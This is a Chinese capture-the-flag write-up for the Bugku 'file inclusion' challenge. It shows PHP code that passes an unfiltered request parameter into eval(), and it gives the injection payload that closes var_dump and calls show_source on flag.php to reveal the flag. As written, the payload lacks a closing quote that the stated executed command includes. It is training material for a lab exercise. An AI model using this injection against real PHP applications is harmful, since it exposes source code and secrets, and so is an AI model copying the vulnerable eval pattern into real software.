码迷,mamicode.com
首页 > 其他好文 > 详细

Bugku_CTF Writeup 之 文件包含(60)

时间:2018-09-03 15:06:15      阅读:541      评论:0      收藏:0      [点我收藏+]

标签:include   request   href   方法   var_dump   说明   执行   变量   style   

题目说明:

地址:http://120.24.86.145:8003/

 

1. 打开页面发现给出了php源码

1 <?php 
2     include "flag.php"; 
3     $a = @$_REQUEST[‘hello‘]; 
4     eval( "var_dump($a);"); 
5     show_source(__FILE__); 
6 ?>

 

 

 

2.flag应该在flag.php里,想办法将其爆出

  (1)a变量由$_REQUEST变量获取,可以用GET或POST方法为hello赋值进而为$a赋值

  (2)程序并未对hello的输入进行判断过滤

  (3)eval函数中执行的命令进而可以被$a的值所决定

 

 

 

3.类似于构造SQL注入语句,构造hello的值为        1);show_source("flag.php);var_dump(1

  GET方法传参后,eval函数实际执行的命令是  var_dump(1);show_source("flag.php");var_dump(1);
  即可得到flag.php的源码并得到flag

 

Bugku_CTF Writeup 之 文件包含(60)

标签:include   request   href   方法   var_dump   说明   执行   变量   style   

原文地址:https://www.cnblogs.com/izayoi/p/9578122.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!